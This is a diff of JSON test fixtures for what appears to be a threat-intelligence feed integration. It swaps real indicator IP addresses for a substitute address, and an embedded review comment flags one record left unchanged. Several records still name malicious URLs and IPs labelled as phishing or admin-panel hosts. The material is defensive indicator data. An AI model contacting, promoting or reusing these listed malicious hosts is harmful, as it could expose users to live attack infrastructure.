- "ingested": "2021-12-13T05:57:34.385545198Z",
- "original": "{\"created\":\"2020-01-26T02:54:41.651Z\",\"description\":\"TS ID: 55256890160; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--ec5f9f49-249b-4fc4-bb91-849c892c7453\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-26T02:54:41.651Z\",\"name\":\"mal_url: http://45.139.236.48/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://45.139.236.48/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:54:41.651Z\"}",
+ "ingested": "2021-12-13T08:38:40.023178Z",
+ "original": "{\"created\":\"2020-01-26T02:54:41.651Z\",\"description\":\"TS ID: 55256890160; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--ec5f9f49-249b-4fc4-bb91-849c892c7453\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-26T02:54:41.651Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:54:41.651Z\"}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -5456,7 +5456,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.385549616Z",
+ "ingested": "2021-12-13T08:38:40.023183300Z",
 "original": "{\"created\":\"2020-01-26T02:54:41.675Z\",\"description\":\"TS ID: 55256890149; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--3e082be1-f6be-45f6-811b-5e63e2a596c5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-01-26T02:54:41.675Z\",\"name\":\"mal_url: http://privatepp.club/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://privatepp.club/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:54:41.675Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -5507,7 +5507,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.385556288Z",
+ "ingested": "2021-12-13T08:38:40.023208700Z",
 "original": "{\"created\":\"2020-01-26T02:54:41.705Z\",\"description\":\"TS ID: 55256890147; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--95774d83-e0e1-45e4-ab1c-1bb27588fa92\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-01-26T02:54:41.705Z\",\"name\":\"mal_url: http://109.94.208.144/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://109.94.208.144/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:54:41.705Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -5526,7 +5526,7 @@
 "object_marking_refs": [
 "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"
 ],
- "name": "mal_url: http://45.14.50.207/panel/admin.php",
+ "name": "mal_url: http://89.160.20.156/panel/admin.php",
 "description": "TS ID: 55256890123; iType: mal_url; State: active; Source: CyberCrime",
 "modified": "2020-01-26T02:55:15.583Z",
 "valid_from": "2020-01-26T02:55:15.583Z",
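Review bot: The `@@ -5507` hunk still carries the public address `109.94.208.144` in its unchanged `event.original` context line (`mal_url: http://109.94.208.144/login`), and no hunk between 5456 and 5526 rewrites that record's `name` or `threat.indicator.url` fields, so the replacement described in the changelog looks incomplete for this indicator. Those structured lines for the record fall outside the visible hunks, so this is inferred from the untouched `event.original`; if the address was left on purpose, the exclusion should be noted in the package's test README. When it is replaced, the `name`, `threat.indicator.url.original`/`domain`/`full` and the `pattern` inside `event.original` must all move together, as the other hunks in this change do, because a fixture where the raw document and the derived fields disagree would describe a pipeline behaviour that does not exist.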
@@ -5551,16 +5551,16 @@
 "url": {
 "path": "/panel/admin.php",
 "extension": "php",
- "original": "http://45.14.50.207/panel/admin.php",
+ "original": "http://89.160.20.156/panel/admin.php",
 "scheme": "http",
- "domain": "45.14.50.207",
- "full": "http://45.14.50.207/panel/admin.php"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156/panel/admin.php"
 }
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.385560797Z",
- "original": "{\"created\":\"2020-01-26T02:55:15.583Z\",\"description\":\"TS ID: 55256890123; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--0149e0f7-629c-41c5-a1e7-144b3c22d362\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-32\"],\"modified\":\"2020-01-26T02:55:15.583Z\",\"name\":\"mal_url: http://45.14.50.207/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://45.14.50.207/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:15.583Z\"}",
+ "ingested": "2021-12-13T08:38:40.023213Z",
+ "original": "{\"created\":\"2020-01-26T02:55:15.583Z\",\"description\":\"TS ID: 55256890123; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--0149e0f7-629c-41c5-a1e7-144b3c22d362\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-32\"],\"modified\":\"2020-01-26T02:55:15.583Z\",\"name\":\"mal_url: http://89.160.20.156/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:15.583Z\"}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -5611,7 +5611,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.385565516Z",
+ "ingested": "2021-12-13T08:38:40.023216400Z",
 "original": "{\"created\":\"2020-01-26T02:55:15.785Z\",\"description\":\"TS ID: 55256890140; iType: mal_url; State: active; Org: Global Data Networks LLC; Source: CyberCrime\",\"id\":\"indicator--751f6e49-92d5-4ff4-9245-870a49dce478\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-26T02:55:15.785Z\",\"name\":\"mal_url: http://molmarsl.com/leks/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://molmarsl.com/leks/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:15.785Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -5662,7 +5662,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.385570445Z",
+ "ingested": "2021-12-13T08:38:40.023220500Z",
 "original": "{\"created\":\"2020-01-26T02:55:22.112Z\",\"description\":\"TS ID: 55256890166; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--e0bdcebe-2f97-4f8f-ad51-0b0c06b5071c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-26T02:55:22.112Z\",\"name\":\"mal_url: http://pecunia110011.at/iteat/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://pecunia110011.at/iteat/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:22.112Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -5681,7 +5681,7 @@
 "object_marking_refs": [
 "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"
 ],
- "name": "mal_url: http://188.127.230.249/login",
+ "name": "mal_url: http://89.160.20.156/login",
 "description": "TS ID: 55256890144; iType: mal_url; State: active; Org: Telecommunication Systems, LLC; Source: CyberCrime",
 "modified": "2020-01-26T02:55:31.348Z",
 "valid_from": "2020-01-26T02:55:31.348Z",
@@ -5705,16 +5705,16 @@
 "provider": "CyberCrime",
 "url": {
 "path": "/login",
- "original": "http://188.127.230.249/login",
+ "original": "http://89.160.20.156/login",
 "scheme": "http",
- "domain": "188.127.230.249",
- "full": "http://188.127.230.249/login"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156/login"
 }
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.385574943Z",
- "original": "{\"created\":\"2020-01-26T02:55:31.348Z\",\"description\":\"TS ID: 55256890144; iType: mal_url; State: active; Org: Telecommunication Systems, LLC; Source: CyberCrime\",\"id\":\"indicator--82f02b81-cfae-4bee-b85d-daf900c93936\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-69\"],\"modified\":\"2020-01-26T02:55:31.348Z\",\"name\":\"mal_url: http://188.127.230.249/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://188.127.230.249/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:31.348Z\"}",
+ "ingested": "2021-12-13T08:38:40.023224100Z",
+ "original": "{\"created\":\"2020-01-26T02:55:31.348Z\",\"description\":\"TS ID: 55256890144; iType: mal_url; State: active; Org: Telecommunication Systems, LLC; Source: CyberCrime\",\"id\":\"indicator--82f02b81-cfae-4bee-b85d-daf900c93936\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-69\"],\"modified\":\"2020-01-26T02:55:31.348Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:31.348Z\"}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -5764,7 +5764,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.385579252Z",
+ "ingested": "2021-12-13T08:38:40.023229400Z",
 "original": "{\"created\":\"2020-01-26T02:55:32.119Z\",\"description\":\"TS ID: 55256890158; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--1e540e5a-6fa3-4758-ab61-0d7692fb3d96\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-01-26T02:55:32.119Z\",\"name\":\"mal_url: http://jor1.berbagsansa.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://jor1.berbagsansa.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:32.119Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -5783,7 +5783,7 @@
 "object_marking_refs": [
 "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"
 ],
- "name": "mal_url: http://92.63.192.190/login",
+ "name": "mal_url: http://89.160.20.156/login",
 "description": "TS ID: 55256890152; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime",
 "modified": "2020-01-26T02:55:33.623Z",
 "valid_from": "2020-01-26T02:55:33.623Z",
@@ -5807,16 +5807,16 @@
 "provider": "CyberCrime",
 "url": {
 "path": "/login",
- "original": "http://92.63.192.190/login",
+ "original": "http://89.160.20.156/login",
 "scheme": "http",
- "domain": "92.63.192.190",
- "full": "http://92.63.192.190/login"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156/login"
 }
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.385584191Z",
- "original": "{\"created\":\"2020-01-26T02:55:33.623Z\",\"description\":\"TS ID: 55256890152; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--cbfc3b5d-645b-4114-ab89-7ab5b745d230\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-48\"],\"modified\":\"2020-01-26T02:55:33.623Z\",\"name\":\"mal_url: http://92.63.192.190/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://92.63.192.190/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:33.623Z\"}",
+ "ingested": "2021-12-13T08:38:40.023233500Z",
+ "original": "{\"created\":\"2020-01-26T02:55:33.623Z\",\"description\":\"TS ID: 55256890152; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--cbfc3b5d-645b-4114-ab89-7ab5b745d230\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-48\"],\"modified\":\"2020-01-26T02:55:33.623Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:33.623Z\"}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -5834,7 +5834,7 @@
 "object_marking_refs": [
 "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"
 ],
- "name": "mal_url: http://190.14.38.202/login",
+ "name": "mal_url: http://89.160.20.156/login",
 "description": "TS ID: 55256890143; iType: mal_url; State: active; Org: Offshore Racks S.A; Source: CyberCrime",
 "modified": "2020-01-26T02:55:33.646Z",
 "valid_from": "2020-01-26T02:55:33.646Z",
@@ -5858,16 +5858,16 @@
 "provider": "CyberCrime",
 "url": {
 "path": "/login",
- "original": "http://190.14.38.202/login",
+ "original": "http://89.160.20.156/login",
 "scheme": "http",
- "domain": "190.14.38.202",
- "full": "http://190.14.38.202/login"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156/login"
 }
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.385588589Z",
- "original": "{\"created\":\"2020-01-26T02:55:33.646Z\",\"description\":\"TS ID: 55256890143; iType: mal_url; State: active; Org: Offshore Racks S.A; Source: CyberCrime\",\"id\":\"indicator--f4cf51da-17db-4d9b-bb65-efeb1373f01b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-21\"],\"modified\":\"2020-01-26T02:55:33.646Z\",\"name\":\"mal_url: http://190.14.38.202/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://190.14.38.202/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:33.646Z\"}",
+ "ingested": "2021-12-13T08:38:40.023237200Z",
+ "original": "{\"created\":\"2020-01-26T02:55:33.646Z\",\"description\":\"TS ID: 55256890143; iType: mal_url; State: active; Org: Offshore Racks S.A; Source: CyberCrime\",\"id\":\"indicator--f4cf51da-17db-4d9b-bb65-efeb1373f01b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-21\"],\"modified\":\"2020-01-26T02:55:33.646Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:33.646Z\"}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -5885,7 +5885,7 @@
 "object_marking_refs": [
 "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"
 ],
- "name": "mal_url: http://45.132.104.20/login",
+ "name": "mal_url: http://89.160.20.156/login",
 "description": "TS ID: 55256890162; iType: mal_url; State: active; Source: CyberCrime",
 "modified": "2020-01-26T02:55:33.681Z",
 "valid_from": "2020-01-26T02:55:33.681Z",
@@ -5909,16 +5909,16 @@
 "provider": "CyberCrime",
 "url": {
 "path": "/login",
- "original": "http://45.132.104.20/login",
+ "original": "http://89.160.20.156/login",
 "scheme": "http",
- "domain": "45.132.104.20",
- "full": "http://45.132.104.20/login"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156/login"
 }
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.385593067Z",
- "original": "{\"created\":\"2020-01-26T02:55:33.681Z\",\"description\":\"TS ID: 55256890162; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--6e4e6382-002d-473a-a635-cc00d4917353\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-01-26T02:55:33.681Z\",\"name\":\"mal_url: http://45.132.104.20/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://45.132.104.20/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:33.681Z\"}",
+ "ingested": "2021-12-13T08:38:40.023240600Z",
+ "original": "{\"created\":\"2020-01-26T02:55:33.681Z\",\"description\":\"TS ID: 55256890162; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--6e4e6382-002d-473a-a635-cc00d4917353\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-01-26T02:55:33.681Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:33.681Z\"}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -5969,7 +5969,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.385597536Z",
+ "ingested": "2021-12-13T08:38:40.023244200Z",
 "original": "{\"created\":\"2020-01-26T02:55:33.738Z\",\"description\":\"TS ID: 55256890138; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--33552aa0-5a5a-47a6-b529-a810dcf8c9af\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-28\"],\"modified\":\"2020-01-26T02:55:33.738Z\",\"name\":\"mal_url: http://aboutworld.info/manage/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://aboutworld.info/manage/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:33.738Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -5988,7 +5988,7 @@
 "object_marking_refs": [
 "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"
 ],
- "name": "mal_url: http://176.113.115.205/login",
+ "name": "mal_url: http://89.160.20.156/login",
 "description": "TS ID: 55256890146; iType: mal_url; State: active; Org: Dzinet Ltd.; Source: CyberCrime",
 "modified": "2020-01-26T02:55:33.959Z",
 "valid_from": "2020-01-26T02:55:33.959Z",
@@ -6012,16 +6012,16 @@
 "provider": "CyberCrime",
 "url": {
 "path": "/login",
- "original": "http://176.113.115.205/login",
+ "original": "http://89.160.20.156/login",
 "scheme": "http",
- "domain": "176.113.115.205",
- "full": "http://176.113.115.205/login"
+ "domain": "89.160.20.156",
+ "full": "http://89.160.20.156/login"
 }
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.385601754Z",
- "original": "{\"created\":\"2020-01-26T02:55:33.959Z\",\"description\":\"TS ID: 55256890146; iType: mal_url; State: active; Org: Dzinet Ltd.; Source: CyberCrime\",\"id\":\"indicator--cd8459e5-367f-46b2-91e7-9893c766091a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-01-26T02:55:33.959Z\",\"name\":\"mal_url: http://176.113.115.205/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://176.113.115.205/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:33.959Z\"}",
+ "ingested": "2021-12-13T08:38:40.023248500Z",
+ "original": "{\"created\":\"2020-01-26T02:55:33.959Z\",\"description\":\"TS ID: 55256890146; iType: mal_url; State: active; Org: Dzinet Ltd.; Source: CyberCrime\",\"id\":\"indicator--cd8459e5-367f-46b2-91e7-9893c766091a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-01-26T02:55:33.959Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:33.959Z\"}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -6071,7 +6071,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.385606202Z",
+ "ingested": "2021-12-13T08:38:40.023253200Z",
 "original": "{\"created\":\"2020-01-26T02:55:33.984Z\",\"description\":\"TS ID: 55256890128; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime\",\"id\":\"indicator--274a9145-93f7-4146-a879-68fce2fc1188\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-01-26T02:55:33.984Z\",\"name\":\"mal_url: http://10121.165-227-83-163.site/admin/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://10121.165-227-83-163.site/admin/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:33.984Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -6122,7 +6122,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.385610590Z",
+ "ingested": "2021-12-13T08:38:40.023257Z",
 "original": "{\"created\":\"2020-01-26T02:55:34.637Z\",\"description\":\"TS ID: 55256890132; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime\",\"id\":\"indicator--ea0abbe1-3033-4549-8ba0-626f43807986\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-01-26T02:55:34.637Z\",\"name\":\"mal_url: http://1926.165-227-83-163.site/admin/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://1926.165-227-83-163.site/admin/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:34.637Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -6141,7 +6141,7 @@
 "object_marking_refs": [
 "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"
 ],
- "name": "mal_ip: 45.139.236.6",
+ "name": "mal_ip: 89.160.20.156",
 "description": "TS ID: 55256890120; iType: mal_ip; State: active; Source: CyberCrime",
 "modified": "2020-01-26T02:55:44.765Z",
 "valid_from": "2020-01-26T02:55:44.765Z",
@@ -6163,12 +6163,12 @@
 "first_seen": "2020-01-26T02:55:44.765Z",
 "type": "ipv4-addr",
 "provider": "CyberCrime",
- "ip": "45.139.236.6"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.385615349Z",
- "original": "{\"created\":\"2020-01-26T02:55:44.765Z\",\"description\":\"TS ID: 55256890120; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--c7c3a0d7-fccd-4bc0-9011-a6c91f967402\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-01-26T02:55:44.765Z\",\"name\":\"mal_ip: 45.139.236.6\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '45.139.236.6']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:44.765Z\"}",
+ "ingested": "2021-12-13T08:38:40.023261300Z",
+ "original": "{\"created\":\"2020-01-26T02:55:44.765Z\",\"description\":\"TS ID: 55256890120; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--c7c3a0d7-fccd-4bc0-9011-a6c91f967402\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-01-26T02:55:44.765Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:44.765Z\"}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -6186,7 +6186,7 @@
 "object_marking_refs": [
 "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"
 ],
- "name": "mal_ip: 92.63.197.185",
+ "name": "mal_ip: 89.160.20.156",
 "description": "TS ID: 55256890150; iType: mal_ip; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime",
 "modified": "2020-01-26T02:55:48.315Z",
 "valid_from": "2020-01-26T02:55:48.315Z",
@@ -6208,12 +6208,12 @@
 "first_seen": "2020-01-26T02:55:48.315Z",
 "type": "ipv4-addr",
 "provider": "CyberCrime",
- "ip": "92.63.197.185"
+ "ip": "89.160.20.156"
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.385619557Z",
- "original": "{\"created\":\"2020-01-26T02:55:48.315Z\",\"description\":\"TS ID: 55256890150; iType: mal_ip; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--383708ec-c15c-400a-94fc-40d6ac5ab8e3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-26T02:55:48.315Z\",\"name\":\"mal_ip: 92.63.197.185\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '92.63.197.185']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:48.315Z\"}",
+ "ingested": "2021-12-13T08:38:40.023266Z",
+ "original": "{\"created\":\"2020-01-26T02:55:48.315Z\",\"description\":\"TS ID: 55256890150; iType: mal_ip; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--383708ec-c15c-400a-94fc-40d6ac5ab8e3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-26T02:55:48.315Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:48.315Z\"}",
 "category": "threat",
 "type": "indicator",
 "kind": "enrichment"
@@ -6263,7 +6263,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.385624396Z",
+ "ingested": "2021-12-13T08:38:40.023269800Z",
 "original": "{\"created\":\"2020-01-26T02:55:48.35Z\",\"description\":\"TS ID: 55256890136; iType: mal_url; State: active; Org: GoDaddy.com, LLC; Source: CyberCrime\",\"id\":\"indicator--14c3d4da-f364-4af0-96ba-ce8959da560b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-01-26T02:55:48.35Z\",\"name\":\"mal_url: http://185-24-53-218.com/admin/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://185-24-53-218.com/admin/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:48.35Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -6314,7 +6314,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.385628734Z",
+ "ingested": "2021-12-13T08:38:40.023273500Z",
 "original": "{\"created\":\"2020-01-26T02:55:58.711Z\",\"description\":\"TS ID: 55256890133; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime\",\"id\":\"indicator--64655563-a4ad-4097-8cda-68c7bcc461f4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-26T02:55:58.711Z\",\"name\":\"mal_url: http://1410.165-227-83-163.site/admin/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://1410.165-227-83-163.site/admin/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-26T02:55:58.711Z\"}",
 "category": "threat",
 "type": "indicator",
@@ -6366,7 +6366,7 @@
 }
 },
 "event": {
- "ingested": "2021-12-13T05:57:34.385633784Z",
+ "ingested": "2021-12-13T08:38:40.023278700Z",
